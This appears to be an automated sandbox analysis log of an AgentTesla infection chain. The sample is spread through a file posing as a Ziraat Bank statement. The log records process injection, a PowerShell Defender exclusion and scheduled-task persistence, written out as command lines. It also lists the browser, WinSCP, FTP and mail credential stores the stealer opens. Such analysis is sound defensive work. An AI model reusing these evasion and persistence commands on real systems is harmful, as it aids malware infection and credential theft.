Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2F9008	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E4008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 377008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02D95ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02D9A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02D95BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02D9A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	29_2_02C35ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	29_2_02C35BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetLocaleInfoA,	29_2_02C3A810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02D9920C GetLocalTime,

4_2_02D9920C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02D9B78C GetVersionExA,

4_2_02D9B78C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
